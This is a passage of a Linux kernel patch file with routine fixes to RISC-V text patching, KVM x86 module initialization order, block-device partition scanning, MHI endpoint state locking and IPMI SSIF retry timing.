+ 	(RVC_X(x_, RVC_B_IMM_7_6_OPOFF, RVC_B_IMM_7_6_MASK) << RVC_B_IMM_7_6_OFF) | \
+ 	(RVC_IMM_SIGN(x_) << RVC_B_IMM_SIGN_OFF); })
++
++#endif /* _ASM_RISCV_INSN_H */
+diff --git a/arch/riscv/include/asm/patch.h b/arch/riscv/include/asm/patch.h
+index 9a7d7346001ee..98d9de07cba17 100644
+--- a/arch/riscv/include/asm/patch.h
++++ b/arch/riscv/include/asm/patch.h
+@@ -9,4 +9,6 @@
+ int patch_text_nosync(void *addr, const void *insns, size_t len);
+ int patch_text(void *addr, u32 insn);
+ 
++extern int riscv_patch_in_stop_machine;
++
+ #endif /* _ASM_RISCV_PATCH_H */
+diff --git a/arch/riscv/kernel/compat_vdso/Makefile b/arch/riscv/kernel/compat_vdso/Makefile
+index 260daf3236d3a..7f34f3c7c8827 100644
+--- a/arch/riscv/kernel/compat_vdso/Makefile
++++ b/arch/riscv/kernel/compat_vdso/Makefile
+@@ -14,6 +14,10 @@ COMPAT_LD := $(LD)
+ COMPAT_CC_FLAGS := -march=rv32g -mabi=ilp32
+ COMPAT_LD_FLAGS := -melf32lriscv
+ 
++# Disable attributes, as they're useless and break the build.
++COMPAT_CC_FLAGS += $(call cc-option,-mno-riscv-attribute)
++COMPAT_CC_FLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++
+ # Files to link into the compat_vdso
+ obj-compat_vdso = $(patsubst %, %.o, $(compat_vdso-syms)) note.o
+ 
+diff --git a/arch/riscv/kernel/ftrace.c b/arch/riscv/kernel/ftrace.c
+index 5bff37af4770b..03a6434a8cdd0 100644
+--- a/arch/riscv/kernel/ftrace.c
++++ b/arch/riscv/kernel/ftrace.c
+@@ -15,10 +15,19 @@
+ void ftrace_arch_code_modify_prepare(void) __acquires(&text_mutex)
+ {
+ 	mutex_lock(&text_mutex);
++
++	/*
++	 * The code sequences we use for ftrace can't be patched while the
++	 * kernel is running, so we need to use stop_machine() to modify them
++	 * for now.  This doesn't play nice with text_mutex, so we use this flag
++	 * to elide the check.
++	 */
++	riscv_patch_in_stop_machine = true;
+ }
+ 
+ void ftrace_arch_code_modify_post_process(void) __releases(&text_mutex)
+ {
++	riscv_patch_in_stop_machine = false;
+ 	mutex_unlock(&text_mutex);
+ }
+ 
+@@ -107,9 +116,9 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec)
+ {
+ 	int out;
+ 
+-	ftrace_arch_code_modify_prepare();
++	mutex_lock(&text_mutex);
+ 	out = ftrace_make_nop(mod, rec, MCOUNT_ADDR);
+-	ftrace_arch_code_modify_post_process();
++	mutex_unlock(&text_mutex);
+ 
+ 	return out;
+ }
+diff --git a/arch/riscv/kernel/patch.c b/arch/riscv/kernel/patch.c
+index 765004b605132..e099961453cca 100644
+--- a/arch/riscv/kernel/patch.c
++++ b/arch/riscv/kernel/patch.c
+@@ -11,6 +11,7 @@
+ #include <asm/kprobes.h>
+ #include <asm/cacheflush.h>
+ #include <asm/fixmap.h>
++#include <asm/ftrace.h>
+ #include <asm/patch.h>
+ 
+ struct patch_insn {
+@@ -19,6 +20,8 @@ struct patch_insn {
+ 	atomic_t cpu_count;
+ };
+ 
++int riscv_patch_in_stop_machine = false;
++
+ #ifdef CONFIG_MMU
+ /*
+  * The fix_to_virt(, idx) needs a const value (not a dynamic variable of
+@@ -59,8 +62,15 @@ static int patch_insn_write(void *addr, const void *insn, size_t len)
+ 	 * Before reaching here, it was expected to lock the text_mutex
+ 	 * already, so we don't need to give another lock here and could
+ 	 * ensure that it was safe between each cores.
++	 *
++	 * We're currently using stop_machine() for ftrace & kprobes, and while
++	 * that ensures text_mutex is held before installing the mappings it
++	 * does not ensure text_mutex is held by the calling thread.  That's
++	 * safe but triggers a lockdep failure, so just elide it for that
++	 * specific case.
+ 	 */
+-	lockdep_assert_held(&text_mutex);
++	if (!riscv_patch_in_stop_machine)
++		lockdep_assert_held(&text_mutex);
+ 
+ 	if (across_pages)
+ 		patch_map(addr + len, FIX_TEXT_POKE1);
+@@ -121,13 +131,25 @@ NOKPROBE_SYMBOL(patch_text_cb);
+ 
+ int patch_text(void *addr, u32 insn)
+ {
++	int ret;
+ 	struct patch_insn patch = {
+ 		.addr = addr,
+ 		.insn = insn,
+ 		.cpu_count = ATOMIC_INIT(0),
+ 	};
+ 
+-	return stop_machine_cpuslocked(patch_text_cb,
+-				       &patch, cpu_online_mask);
++	/*
++	 * kprobes takes text_mutex, before calling patch_text(), but as it
++	 * calls stop_machine(), the lockdep assertion in patch_insn_write()
++	 * gets confused by the context in which the lock is taken.
++	 * Instead, ensure the lock is held before calling stop_machine(), and
++	 * set riscv_patch_in_stop_machine to skip the check in
++	 * patch_insn_write().
++	 */
++	lockdep_assert_held(&text_mutex);
++	riscv_patch_in_stop_machine = true;
++	ret = stop_machine_cpuslocked(patch_text_cb, &patch, cpu_online_mask);
++	riscv_patch_in_stop_machine = false;
++	return ret;
+ }
+ NOKPROBE_SYMBOL(patch_text);
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index 85cd5442d2f81..17d7383f201a5 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -92,7 +92,7 @@ void notrace walk_stackframe(struct task_struct *task,
+ 	while (!kstack_end(ksp)) {
+ 		if (__kernel_text_address(pc) && unlikely(!fn(arg, pc)))
+ 			break;
+-		pc = (*ksp++) - 0x4;
++		pc = READ_ONCE_NOCHECK(*ksp++) - 0x4;
+ 	}
+ }
+ 
+diff --git a/arch/um/kernel/vmlinux.lds.S b/arch/um/kernel/vmlinux.lds.S
+index 16e49bfa2b426..53d719c04ba94 100644
+--- a/arch/um/kernel/vmlinux.lds.S
++++ b/arch/um/kernel/vmlinux.lds.S
+@@ -1,4 +1,4 @@
+-
++#define RUNTIME_DISCARD_EXIT
+ KERNEL_STACK_SIZE = 4096 * (1 << CONFIG_KERNEL_STACK_ORDER);
+ 
+ #ifdef CONFIG_LD_SCRIPT_STATIC
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index f05ebaa26f0ff..ef8cabfbe8540 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1695,6 +1695,9 @@ extern struct kvm_x86_ops kvm_x86_ops;
+ #define KVM_X86_OP_OPTIONAL_RET0 KVM_X86_OP
+ #include <asm/kvm-x86-ops.h>
+ 
++int kvm_x86_vendor_init(struct kvm_x86_init_ops *ops);
++void kvm_x86_vendor_exit(void);
++
+ #define __KVM_HAVE_ARCH_VM_ALLOC
+ static inline struct kvm *kvm_arch_alloc_vm(void)
+ {
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index c75d75b9f11aa..d2dbbc50b3a7b 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -880,6 +880,15 @@ void init_spectral_chicken(struct cpuinfo_x86 *c)
+ 		}
+ 	}
+ #endif
++	/*
++	 * Work around Erratum 1386.  The XSAVES instruction malfunctions in
++	 * certain circumstances on Zen1/2 uarch, and not all parts have had
++	 * updated microcode at the time of writing (March 2023).
++	 *
++	 * Affected parts all have no supervisor XSAVE states, meaning that
++	 * the XSAVEC instruction (which works fine) is equivalent.
++	 */
++	clear_cpu_cap(c, X86_FEATURE_XSAVES);
+ }
+ 
+ static void init_amd_zn(struct cpuinfo_x86 *c)
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index bfe93a1c4f92e..3629dd979667c 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -5080,15 +5080,34 @@ static struct kvm_x86_init_ops svm_init_ops __initdata = {
+ 
+ static int __init svm_init(void)
+ {
++	int r;
++
+ 	__unused_size_checks();
+ 
+-	return kvm_init(&svm_init_ops, sizeof(struct vcpu_svm),
+-			__alignof__(struct vcpu_svm), THIS_MODULE);
++	r = kvm_x86_vendor_init(&svm_init_ops);
++	if (r)
++		return r;
++
++	/*
++	 * Common KVM initialization _must_ come last; after this, /dev/kvm is
++	 * exposed to userspace!
++	 */
++	r = kvm_init(&svm_init_ops, sizeof(struct vcpu_svm),
++		     __alignof__(struct vcpu_svm), THIS_MODULE);
++	if (r)
++		goto err_kvm_init;
++
++	return 0;
++
++err_kvm_init:
++	kvm_x86_vendor_exit();
++	return r;
+ }
+ 
+ static void __exit svm_exit(void)
+ {
+ 	kvm_exit();
++	kvm_x86_vendor_exit();
+ }
+ 
+ module_init(svm_init)
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index f5c1cb7cec8a7..bc868958e91fe 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -551,6 +551,33 @@ static int hv_enable_direct_tlbflush(struct kvm_vcpu *vcpu)
+ 	return 0;
+ }
+ 
++static void hv_reset_evmcs(void)
++{
++	struct hv_vp_assist_page *vp_ap;
++
++	if (!static_branch_unlikely(&enable_evmcs))
++		return;
++
++	/*
++	 * KVM should enable eVMCS if and only if all CPUs have a VP assist
++	 * page, and should reject CPU onlining if eVMCS is enabled but the
++	 * CPU doesn't have a VP assist page allocated.
++	 */
++	vp_ap = hv_get_vp_assist_page(smp_processor_id());
++	if (WARN_ON_ONCE(!vp_ap))
++		return;
++
++	/*
++	 * Reset everything to support using non-enlightened VMCS access later
++	 * (e.g. when we reload the module with enlightened_vmcs=0)
++	 */
++	vp_ap->nested_control.features.directhypercall = 0;
++	vp_ap->current_nested_vmcs = 0;
++	vp_ap->enlighten_vmentry = 0;
++}
++
++#else /* IS_ENABLED(CONFIG_HYPERV) */
++static void hv_reset_evmcs(void) {}
+ #endif /* IS_ENABLED(CONFIG_HYPERV) */
+ 
+ /*
+@@ -2501,6 +2528,8 @@ static void vmx_hardware_disable(void)
+ 	if (cpu_vmxoff())
+ 		kvm_spurious_fault();
+ 
++	hv_reset_evmcs();
++
+ 	intel_pt_handle_vmx(0);
+ }
+ 
+@@ -8427,41 +8456,23 @@ static void vmx_cleanup_l1d_flush(void)
+ 	l1tf_vmx_mitigation = VMENTER_L1D_FLUSH_AUTO;
+ }
+ 
+-static void vmx_exit(void)
++static void __vmx_exit(void)
+ {
++	allow_smaller_maxphyaddr = false;
++
+ #ifdef CONFIG_KEXEC_CORE
+ 	RCU_INIT_POINTER(crash_vmclear_loaded_vmcss, NULL);
+ 	synchronize_rcu();
+ #endif
++	vmx_cleanup_l1d_flush();
++}
+ 
++static void vmx_exit(void)
++{
+ 	kvm_exit();
++	kvm_x86_vendor_exit();
+ 
+-#if IS_ENABLED(CONFIG_HYPERV)
+-	if (static_branch_unlikely(&enable_evmcs)) {
+-		int cpu;
+-		struct hv_vp_assist_page *vp_ap;
+-		/*
+-		 * Reset everything to support using non-enlightened VMCS
+-		 * access later (e.g. when we reload the module with
+-		 * enlightened_vmcs=0)
+-		 */
+-		for_each_online_cpu(cpu) {
+-			vp_ap =	hv_get_vp_assist_page(cpu);
+-
+-			if (!vp_ap)
+-				continue;
+-
+-			vp_ap->nested_control.features.directhypercall = 0;
+-			vp_ap->current_nested_vmcs = 0;
+-			vp_ap->enlighten_vmentry = 0;
+-		}
+-
+-		static_branch_disable(&enable_evmcs);
+-	}
+-#endif
+-	vmx_cleanup_l1d_flush();
+-
+-	allow_smaller_maxphyaddr = false;
++	__vmx_exit();
+ }
+ module_exit(vmx_exit);
+ 
+@@ -8502,23 +8513,20 @@ static int __init vmx_init(void)
+ 	}
+ #endif
+ 
+-	r = kvm_init(&vmx_init_ops, sizeof(struct vcpu_vmx),
+-		     __alignof__(struct vcpu_vmx), THIS_MODULE);
++	r = kvm_x86_vendor_init(&vmx_init_ops);
+ 	if (r)
+ 		return r;
+ 
+ 	/*
+-	 * Must be called after kvm_init() so enable_ept is properly set
++	 * Must be called after common x86 init so enable_ept is properly set
+ 	 * up. Hand in the mitigation parameter value, which was stored by
+ 	 * the pre-module-init parser. If no parameter was given, it will
+ 	 * contain 'auto' which will be turned into the default 'cond'
+ 	 * mitigation mode.
+ 	 */
+ 	r = vmx_setup_l1d_flush(vmentry_l1d_flush_param);
+-	if (r) {
+-		vmx_exit();
+-		return r;
+-	}
++	if (r)
++		goto err_l1d_flush;
+ 
+ 	vmx_setup_fb_clear_ctrl();
+ 
+@@ -8542,6 +8550,21 @@ static int __init vmx_init(void)
+ 	if (!enable_ept)
+ 		allow_smaller_maxphyaddr = true;
+ 
++	/*
++	 * Common KVM initialization _must_ come last; after this, /dev/kvm is
++	 * exposed to userspace!
++	 */
++	r = kvm_init(&vmx_init_ops, sizeof(struct vcpu_vmx),
++		     __alignof__(struct vcpu_vmx), THIS_MODULE);
++	if (r)
++		goto err_kvm_init;
++
+ 	return 0;
++
++err_kvm_init:
++	__vmx_exit();
++err_l1d_flush:
++	kvm_x86_vendor_exit();
++	return r;
+ }
+ module_init(vmx_init);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 68827b8dc37a5..ab09d292bdede 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -9351,7 +9351,16 @@ static struct notifier_block pvclock_gtod_notifier = {
+ 
+ int kvm_arch_init(void *opaque)
+ {
+-	struct kvm_x86_init_ops *ops = opaque;
++	return 0;
++}
++
++void kvm_arch_exit(void)
++{
++
++}
++
++int kvm_x86_vendor_init(struct kvm_x86_init_ops *ops)
++{
+ 	u64 host_pat;
+ 	int r;
+ 
+@@ -9441,8 +9450,9 @@ out_free_x86_emulator_cache:
+ 	kmem_cache_destroy(x86_emulator_cache);
+ 	return r;
+ }
++EXPORT_SYMBOL_GPL(kvm_x86_vendor_init);
+ 
+-void kvm_arch_exit(void)
++void kvm_x86_vendor_exit(void)
+ {
+ #ifdef CONFIG_X86_64
+ 	if (hypervisor_is_type(X86_HYPER_MS_HYPERV))
+@@ -9468,6 +9478,7 @@ void kvm_arch_exit(void)
+ 	WARN_ON(static_branch_unlikely(&kvm_xen_enabled.key));
+ #endif
+ }
++EXPORT_SYMBOL_GPL(kvm_x86_vendor_exit);
+ 
+ static int __kvm_emulate_halt(struct kvm_vcpu *vcpu, int state, int reason)
+ {
+diff --git a/block/blk.h b/block/blk.h
+index 8b75a95b28d60..a186ea20f39d8 100644
+--- a/block/blk.h
++++ b/block/blk.h
+@@ -436,7 +436,7 @@ static inline struct kmem_cache *blk_get_queue_kmem_cache(bool srcu)
+ }
+ struct request_queue *blk_alloc_queue(int node_id, bool alloc_srcu);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner);
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode);
+ 
+ int disk_alloc_events(struct gendisk *disk);
+ void disk_add_events(struct gendisk *disk);
+diff --git a/block/genhd.c b/block/genhd.c
+index c4765681a8b4b..0b6928e948f31 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -356,9 +356,10 @@ void disk_uevent(struct gendisk *disk, enum kobject_action action)
+ }
+ EXPORT_SYMBOL_GPL(disk_uevent);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner)
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ {
+ 	struct block_device *bdev;
++	int ret = 0;
+ 
+ 	if (disk->flags & (GENHD_FL_NO_PART | GENHD_FL_HIDDEN))
+ 		return -EINVAL;
+@@ -366,16 +367,29 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner)
+ 		return -EINVAL;
+ 	if (disk->open_partitions)
+ 		return -EBUSY;
+-	/* Someone else has bdev exclusively open? */
+-	if (disk->part0->bd_holder && disk->part0->bd_holder != owner)
+-		return -EBUSY;
+ 
+ 	set_bit(GD_NEED_PART_SCAN, &disk->state);
+-	bdev = blkdev_get_by_dev(disk_devt(disk), mode, NULL);
++	/*
++	 * If the device is already opened exclusively by the current thread,
++	 * it's safe to scan partitions; otherwise, use bd_prepare_to_claim() to
++	 * synchronize with other exclusive openers and other partition
++	 * scanners.
++	 */
++	if (!(mode & FMODE_EXCL)) {
++		ret = bd_prepare_to_claim(disk->part0, disk_scan_partitions);
++		if (ret)
++			return ret;
++	}
++
++	bdev = blkdev_get_by_dev(disk_devt(disk), mode & ~FMODE_EXCL, NULL);
+ 	if (IS_ERR(bdev))
+-		return PTR_ERR(bdev);
+-	blkdev_put(bdev, mode);
+-	return 0;
++		ret = PTR_ERR(bdev);
++	else
++		blkdev_put(bdev, mode & ~FMODE_EXCL);
++
++	if (!(mode & FMODE_EXCL))
++		bd_abort_claiming(disk->part0, disk_scan_partitions);
++	return ret;
+ }
+ 
+ /**
+@@ -501,9 +515,14 @@ int __must_check device_add_disk(struct device *parent, struct gendisk *disk,
+ 		if (ret)
+ 			goto out_unregister_bdi;
+ 
++		/* Make sure the first partition scan will proceed */
++		if (get_capacity(disk) && !(disk->flags & GENHD_FL_NO_PART) &&
++		    !test_bit(GD_SUPPRESS_PART_SCAN, &disk->state))
++			set_bit(GD_NEED_PART_SCAN, &disk->state);
++
+ 		bdev_add(disk->part0, ddev->devt);
+ 		if (get_capacity(disk))
+-			disk_scan_partitions(disk, FMODE_READ, NULL);
++			disk_scan_partitions(disk, FMODE_READ);
+ 
+ 		/*
+ 		 * Announce the disk and partitions after all partitions are
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 96617512982e5..9c5f637ff153f 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -467,10 +467,10 @@ static int blkdev_bszset(struct block_device *bdev, fmode_t mode,
+  * user space. Note the separate arg/argp parameters that are needed
+  * to deal with the compat_ptr() conversion.
+  */
+-static int blkdev_common_ioctl(struct file *file, fmode_t mode, unsigned cmd,
+-			       unsigned long arg, void __user *argp)
++static int blkdev_common_ioctl(struct block_device *bdev, fmode_t mode,
++			       unsigned int cmd, unsigned long arg,
++			       void __user *argp)
+ {
+-	struct block_device *bdev = I_BDEV(file->f_mapping->host);
+ 	unsigned int max_sectors;
+ 
+ 	switch (cmd) {
+@@ -528,8 +528,7 @@ static int blkdev_common_ioctl(struct file *file, fmode_t mode, unsigned cmd,
+ 			return -EACCES;
+ 		if (bdev_is_partition(bdev))
+ 			return -EINVAL;
+-		return disk_scan_partitions(bdev->bd_disk, mode & ~FMODE_EXCL,
+-					    file);
++		return disk_scan_partitions(bdev->bd_disk, mode);
+ 	case BLKTRACESTART:
+ 	case BLKTRACESTOP:
+ 	case BLKTRACETEARDOWN:
+@@ -607,7 +606,7 @@ long blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
+ 	if (ret != -ENOIOCTLCMD)
+ 		return ret;
+ 
+@@ -676,7 +675,7 @@ long compat_blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
+ 	if (ret == -ENOIOCTLCMD && disk->fops->compat_ioctl)
+ 		ret = disk->fops->compat_ioctl(bdev, mode, cmd, arg);
+ 
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 357c61c12ce5b..edd153dda40c0 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -990,44 +990,25 @@ static void mhi_ep_abort_transfer(struct mhi_ep_cntrl *mhi_cntrl)
+ static void mhi_ep_reset_worker(struct work_struct *work)
+ {
+ 	struct mhi_ep_cntrl *mhi_cntrl = container_of(work, struct mhi_ep_cntrl, reset_work);
+-	struct device *dev = &mhi_cntrl->mhi_dev->dev;
+ 	enum mhi_state cur_state;
+-	int ret;
+ 
+-	mhi_ep_abort_transfer(mhi_cntrl);
++	mhi_ep_power_down(mhi_cntrl);
++
++	mutex_lock(&mhi_cntrl->state_lock);
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
+ 	/* Reset MMIO to signal host that the MHI_RESET is completed in endpoint */
+ 	mhi_ep_mmio_reset(mhi_cntrl);
+ 	cur_state = mhi_cntrl->mhi_state;
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+ 
+ 	/*
+ 	 * Only proceed further if the reset is due to SYS_ERR. The host will
+ 	 * also issue a reset during shutdown, and we don't need to re-init in
+ 	 * that case.
+ 	 */
+-	if (cur_state == MHI_STATE_SYS_ERR) {
+-		mhi_ep_mmio_init(mhi_cntrl);
+-
+-		/* Set AMSS EE before signaling ready state */
+-		mhi_ep_mmio_set_env(mhi_cntrl, MHI_EE_AMSS);
+-
+-		/* All set, notify the host that we are ready */
+-		ret = mhi_ep_set_ready_state(mhi_cntrl);
+-		if (ret)
+-			return;
+-
+-		dev_dbg(dev, "READY state notification sent to the host\n");
++	if (cur_state == MHI_STATE_SYS_ERR)
++		mhi_ep_power_up(mhi_cntrl);
+ 
+-		ret = mhi_ep_enable(mhi_cntrl);
+-		if (ret) {
+-			dev_err(dev, "Failed to enable MHI endpoint: %d\n", ret);
+-			return;
+-		}
+-
+-		enable_irq(mhi_cntrl->irq);
+-	}
++	mutex_unlock(&mhi_cntrl->state_lock);
+ }
+ 
+ /*
+@@ -1106,11 +1087,11 @@ EXPORT_SYMBOL_GPL(mhi_ep_power_up);
+ 
+ void mhi_ep_power_down(struct mhi_ep_cntrl *mhi_cntrl)
+ {
+-	if (mhi_cntrl->enabled)
++	if (mhi_cntrl->enabled) {
+ 		mhi_ep_abort_transfer(mhi_cntrl);
+-
+-	kfree(mhi_cntrl->mhi_event);
+-	disable_irq(mhi_cntrl->irq);
++		kfree(mhi_cntrl->mhi_event);
++		disable_irq(mhi_cntrl->irq);
++	}
+ }
+ EXPORT_SYMBOL_GPL(mhi_ep_power_down);
+ 
+@@ -1400,8 +1381,8 @@ int mhi_ep_register_controller(struct mhi_ep_cntrl *mhi_cntrl,
+ 
+ 	INIT_LIST_HEAD(&mhi_cntrl->st_transition_list);
+ 	INIT_LIST_HEAD(&mhi_cntrl->ch_db_list);
+-	spin_lock_init(&mhi_cntrl->state_lock);
+ 	spin_lock_init(&mhi_cntrl->list_lock);
++	mutex_init(&mhi_cntrl->state_lock);
+ 	mutex_init(&mhi_cntrl->event_lock);
+ 
+ 	/* Set MHI version and AMSS EE before enumeration */
+diff --git a/drivers/bus/mhi/ep/sm.c b/drivers/bus/mhi/ep/sm.c
+index 3655c19e23c7b..fd200b2ac0bb2 100644
+--- a/drivers/bus/mhi/ep/sm.c
++++ b/drivers/bus/mhi/ep/sm.c
+@@ -63,24 +63,23 @@ int mhi_ep_set_m0_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	int ret;
+ 
+ 	/* If MHI is in M3, resume suspended channels */
+-	spin_lock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
++
+ 	old_state = mhi_cntrl->mhi_state;
+ 	if (old_state == MHI_STATE_M3)
+ 		mhi_ep_resume_channels(mhi_cntrl);
+ 
+ 	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M0);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+-
+ 	if (ret) {
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	/* Signal host that the device moved to M0 */
+ 	ret = mhi_ep_send_state_change_event(mhi_cntrl, MHI_STATE_M0);
+ 	if (ret) {
+ 		dev_err(dev, "Failed sending M0 state change event\n");
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	if (old_state == MHI_STATE_READY) {
+@@ -88,11 +87,14 @@ int mhi_ep_set_m0_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 		ret = mhi_ep_send_ee_event(mhi_cntrl, MHI_EE_AMSS);
+ 		if (ret) {
+ 			dev_err(dev, "Failed sending AMSS EE event\n");
+-			return ret;
++			goto err_unlock;
+ 		}
+ 	}
+ 
+-	return 0;
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
++	return ret;
+ }
+ 
+ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+@@ -100,13 +102,12 @@ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
+ 	int ret;
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
+-	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M3);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
+ 
++	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M3);
+ 	if (ret) {
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	mhi_ep_suspend_channels(mhi_cntrl);
+@@ -115,10 +116,13 @@ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	ret = mhi_ep_send_state_change_event(mhi_cntrl, MHI_STATE_M3);
+ 	if (ret) {
+ 		dev_err(dev, "Failed sending M3 state change event\n");
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+-	return 0;
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
++	return ret;
+ }
+ 
+ int mhi_ep_set_ready_state(struct mhi_ep_cntrl *mhi_cntrl)
+@@ -127,22 +131,24 @@ int mhi_ep_set_ready_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	enum mhi_state mhi_state;
+ 	int ret, is_ready;
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
++
+ 	/* Ensure that the MHISTATUS is set to RESET by host */
+ 	mhi_state = mhi_ep_mmio_masked_read(mhi_cntrl, EP_MHISTATUS, MHISTATUS_MHISTATE_MASK);
+ 	is_ready = mhi_ep_mmio_masked_read(mhi_cntrl, EP_MHISTATUS, MHISTATUS_READY_MASK);
+ 
+ 	if (mhi_state != MHI_STATE_RESET || is_ready) {
+ 		dev_err(dev, "READY state transition failed. MHI host not in RESET state\n");
+-		spin_unlock_bh(&mhi_cntrl->state_lock);
+-		return -EIO;
++		ret = -EIO;
++		goto err_unlock;
+ 	}
+ 
+ 	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_READY);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+-
+ 	if (ret)
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+ 
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
+ 	return ret;
+ }
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index 7c606c49cd535..a5ddebb1edea4 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -74,7 +74,8 @@
+ /*
+  * Timer values
+  */
+-#define SSIF_MSG_USEC		20000	/* 20ms between message tries. */
++#define SSIF_MSG_USEC		60000	/* 60ms between message tries (T3). */
++#define SSIF_REQ_RETRY_USEC	60000	/* 60ms between send retries (T6). */
+ #define SSIF_MSG_PART_USEC	5000	/* 5ms for a message part */
+ 
+ /* How many times to we retry sending/receiving the message. */
+@@ -82,7 +83,9 @@
+ #define	SSIF_RECV_RETRIES	250
+ 
+ #define SSIF_MSG_MSEC		(SSIF_MSG_USEC / 1000)
++#define SSIF_REQ_RETRY_MSEC	(SSIF_REQ_RETRY_USEC / 1000)
+ #define SSIF_MSG_JIFFIES	((SSIF_MSG_USEC * 1000) / TICK_NSEC)
++#define SSIF_REQ_RETRY_JIFFIES	((SSIF_REQ_RETRY_USEC * 1000) / TICK_NSEC)
+ #define SSIF_MSG_PART_JIFFIES	((SSIF_MSG_PART_USEC * 1000) / TICK_NSEC)
+ 
+ /*
+@@ -229,6 +232,9 @@ struct ssif_info {
+ 	bool		    got_alert;
+ 	bool		    waiting_alert;
+ 
++	/* Used to inform the timeout that it should do a resend. */
++	bool		    do_resend;
++
+ 	/*
+ 	 * If set to true, this will request events the next time the
+ 	 * state machine is idle.
+@@ -241,12 +247,6 @@ struct ssif_info {
+ 	 */
+ 	bool                req_flags;
+ 
+-	/*
+-	 * Used to perform timer operations when run-to-completion
+-	 * mode is on.  This is a countdown timer.
+-	 */
+-	int                 rtc_us_timer;
+-
+ 	/* Used for sending/receiving data.  +1 for the length. */
+ 	unsigned char data[IPMI_MAX_MSG_LENGTH + 1];
+ 	unsigned int  data_len;
+@@ -530,7 +530,6 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 
+ static void start_get(struct ssif_info *ssif_info)
+ {
+-	ssif_info->rtc_us_timer = 0;
+ 	ssif_info->multi_pos = 0;
+ 
+ 	ssif_i2c_send(ssif_info, msg_done_handler, I2C_SMBUS_READ,
+@@ -538,22 +537,28 @@ static void start_get(struct ssif_info *ssif_info)
+ 		  ssif_info->recv, I2C_SMBUS_BLOCK_DATA);
+ }
+ 
++static void start_resend(struct ssif_info *ssif_info);
++
+ static void retry_timeout(struct timer_list *t)
+ {
+ 	struct ssif_info *ssif_info = from_timer(ssif_info, t, retry_timer);
+ 	unsigned long oflags, *flags;
+-	bool waiting;
++	bool waiting, resend;
+ 
+ 	if (ssif_info->stopping)
+ 		return;
+ 
+ 	flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
